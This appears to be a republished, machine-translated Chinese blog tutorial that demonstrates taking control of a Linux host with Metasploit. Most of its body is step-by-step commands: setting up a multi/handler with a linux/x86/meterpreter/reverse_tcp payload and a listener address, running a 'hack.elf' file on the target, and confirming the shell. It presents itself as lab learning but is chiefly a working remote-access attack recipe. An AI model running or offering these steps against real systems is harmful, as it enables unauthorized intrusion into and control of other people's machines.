当前位置:网站首页>Network security engineer Demo: original * * controls your server like this! (2)
Network security engineer Demo: original * * controls your server like this! (2)
2020-11-10 07:39:00 【osc_a8r2ub9u】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Linux A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 start-up Metasploit(msf)*** The test framework , As shown in the figure below .
command 1:msfconsole
step 1: Use the corresponding vulnerability to exploit the module , As shown in the figure below .
command 2:use exploit/multi/handler
step 2: Check the parameters corresponding to the vulnerability module , As shown in the figure below .
command 3:show options
step 3: Set the corresponding payload Convenient for follow-up ***, As shown in the figure below .
command :set payload linux/x86/meterpreter/reverse_tcp
step 4: Check the relevant parameters of the vulnerability module , As shown in the figure below .
command :show options
step 5: Set the corresponding parameters , As shown in the figure below .
command :set lhost 193.168.78.169
step 6: Check whether the configured parameters are successful , As shown in the figure below .
command :show options
3.2 function *** file , As shown in the figure below .
step 1: to *** The file gives execution permission , As shown in the figure below .
command :chmod +x hack.elf
step 2: perform *** file , As shown in the figure below .
command :./hack.elf
3.3 Run the exploit module , As shown in the figure below .
command :run
As shown in the figure below , Successfully captured the target host .
View the file system information of the target host , As shown in the figure below .
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[osc_a8r2ub9u]所创,转载请带上原文链接,感谢
边栏推荐
- 《Python Cookbook 3rd》笔记(2.1):使用多个界定符分割字符串
- Incomplete Polyfill of proxy
- Use call, apply and bind to solve the annoying this in JS, this in event binding and parameter passing
- Algorithm template arrangement (1)
- 分布式文档存储数据库之MongoDB索引管理
- jt-day10
- 实验2
- Mongodb kernel source code implementation, performance tuning, best operation and maintenance practice series command processing module source code implementation 1
- An unsafe class named unsafe
- 将Map中对应的key和value赋值到对象中
猜你喜欢

Promote China manufacturing upgrade, 3D visualization of production line in automobile assembly workshop

Filezilla server配置FTP服务器中的各种问题与解决方法

CUDA_共享内存、访存机制、访问优化
![[leetcode] 92 integer inversion](/img/3b/00bc81122d330c9d59909994e61027.jpg)
[leetcode] 92 integer inversion

关于centos启动报错:Failed to start Crash recovery kernel arming的解决方案

Several solutions to the problem that selenium webdriver always fails to use click

Visit 2020 PG Technology Conference

利用尾巴作为时间序列进行处理来识别鲸鱼

Can't find other people's problem to solve

Hand in hand to teach you to use container service tke cluster audit troubleshooting
随机推荐
Assign the corresponding key and value in the map to the object
C++异常实现机制
js解决浏览器打印自动分页的问题
Filezilla server配置FTP服务器中的各种问题与解决方法
Aikang Guobin denounced Guoxin Securities report as untrue and sent a lawyer's letter
编码风格:Mvc模式下SSM环境,代码分层管理
Incomplete Polyfill of proxy
pytorch训练GAN时的detach()
工厂方法模式
CUDA_获取指定设备
CUDA_ Shared memory, memory access mechanism, access optimization
推动中国制造升级,汽车装配车间生产流水线3D可视化
SQL filter query duplicate columns
Simple use of JMeter
Enter C abstract to understand the similarities and differences between abstract classes and interfaces
JS label syntax jumps out of multiple loops
将Map中对应的key和value赋值到对象中
Top 5 Chinese cloud manufacturers in 2018: Alibaba cloud, Tencent cloud, AWS, telecom, Unicom
Experiment 2
使用call、apply和bind解决js中烦人的this,事件绑定时的this和传参问题